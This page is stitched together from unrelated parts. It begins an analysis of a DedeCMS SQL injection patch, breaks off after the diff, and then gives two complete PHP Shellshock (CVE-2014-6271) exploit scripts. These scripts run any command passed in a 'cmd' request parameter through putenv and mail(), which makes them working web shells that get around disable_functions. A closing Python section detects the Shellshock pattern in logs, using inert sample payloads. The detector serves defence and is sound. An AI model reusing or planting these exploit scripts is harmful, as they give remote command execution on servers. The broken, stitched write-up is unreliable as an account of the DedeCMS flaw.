DedeCMS SQL injection affecting all versions

DedeCMS ("织梦", an open-source PHP website content management system) is one of the best-known content management systems today. Known for being simple, practical and open source, it is the most famous open-source PHP website management system in China and the PHP CMS with the most users. Recently a community member found a SQL injection vulnerability in DedeCMS that affects every version; the latest official release has fixed it. Community members have since published several exploit versions. Below we discuss and analyse the exploitation of this vulnerability and its use in practice. Comments and criticism are welcome!

Vulnerability analysis

1) Comparing the vulnerable files

The update notes list the main changed files as: dede/config.php (updated cookie encryption password, disabled tag hints); include/uploadsafe.inc.php (fix for a possible SQL injection); member/soft_edit.php (file-upload filtering). Comparing the earlier version against the updated patch in a file-diff tool, as shown in Figure 1, the changed code is as follows:

//***** after the patch (.php)
}
//$$_key=$_FILES[$_key]['tmp_name']=str_replace("\\\\","\\",$_FILES[$_key]['tmp_name']);
$$_key=$_FILES[$_key]['tmp_name']=$_FILES[$_key]['tmp_name'];
${$_key.'_name'}=$_FILES[$_key]['name'];

//***** before the patch (.php)
}
$$_key=$_FILES[$_key]['tmp_name']=str_replace("\\\\","\\",$_FILES[$_key]['tmp_name']);
// replaces every "\\\\" inside $_FILES[$_key]['tmp_name'] with "\\"
${$_key.'_name'}=$_FILES[$_key]['name'];

Figure 1: Comparison of the code before and after the patch


PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit

<?php
// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
// Date: 22/11/2014
// Exploit Author: ssbostan
// Vendor Homepage: http://www.gnu.org/software/bash/
// Software Link: http://ftp.gnu.org/gnu/bash/
// Version: <= 4.3
// Tested on: Fedora 17, Ubuntu 8.04
// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/
if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
{
    $file=tempnam("/tmp", "xpl");
    putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
    mail("xpl@localhost", "", "", "", "-bv");
    echo file_get_contents($file);
    unlink($file);
}
?>


# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<pre>
<?php echo "Disabled functions: ".ini_get('disable_functions')."\n"; ?>
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
    if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
        $tmp = tempnam(".","data");
        putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
        // In Safe Mode, the user may only alter environment variables whose names
        // begin with the prefixes supplied by this directive.
        // By default, users will only be able to set environment variables that
        // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
        // PHP will let the user modify ANY environment variable!
        mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
    }
    else return "Not vuln (not bash)";
    $output = @file_get_contents($tmp);
    @unlink($tmp);
    if($output != "") return $output;
    else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>

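Both scripts above work by planting a value that starts with a bash function definition, "() {", into the environment before a bash child process is spawned; in the CGI case the same pattern arrives through HTTP header values. The following Python is an added detection example written for this page (it is not part of the original post and not the code of either exploit author): it scans combined-format access log lines and any name/value environment mapping for that trigger. The log lines are constructed samples with inert payloads, and the field names are assumptions.

```python
import re
from typing import Dict, List

# A vulnerable bash executes a function definition found at the start of any
# environment value (CVE-2014-6271); the PHP scripts above plant one with
# putenv(). The whitespace tolerance covers the spaced form "() { :; };".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx combined log format. The referer and user-agent fields reach a
# CGI script as the HTTP_REFERER / HTTP_USER_AGENT environment variables.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# Constructed sample lines (not real traffic); the payloads only echo a string.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
198.51.100.23 - - [25/Sep/2014:10:12:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:10:13:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 210 "() { :; }; echo vulnerable" "curl/7.37.0"
"""


def is_shellshock_payload(value: str) -> bool:
    """True if the value carries a bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_environment(env: Dict[str, str]) -> List[str]:
    """Return the names of variables whose value a vulnerable bash would parse
    as a function definition. Works for a CGI environment and for values
    planted with putenv(), which is how the PHP scripts above deliver it."""
    return [name for name, value in env.items() if is_shellshock_payload(value)]


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan combined-format access log lines and report each field carrying
    the pattern together with the client IP, so the event can be correlated."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a production scanner should count these
        for field in ("request", "referer", "user_agent"):
            if is_shellshock_payload(m.group(field)):
                findings.append({"ip": m.group("ip"), "field": field, "value": m.group(field)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}: shellshock pattern in {f['field']}: {f['value']!r}")
```

Running the block against the constructed sample flags the first line (user-agent) and the third line (referer) and leaves the ordinary browser line alone. The same check applied to the environment of a PHP process catches the putenv()-based variant, because the trigger is the value's shape, not the variable name; restricting the name prefix (the PHP_ rule quoted in the second script's comments) does not remove the hazard, only an updated bash does.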
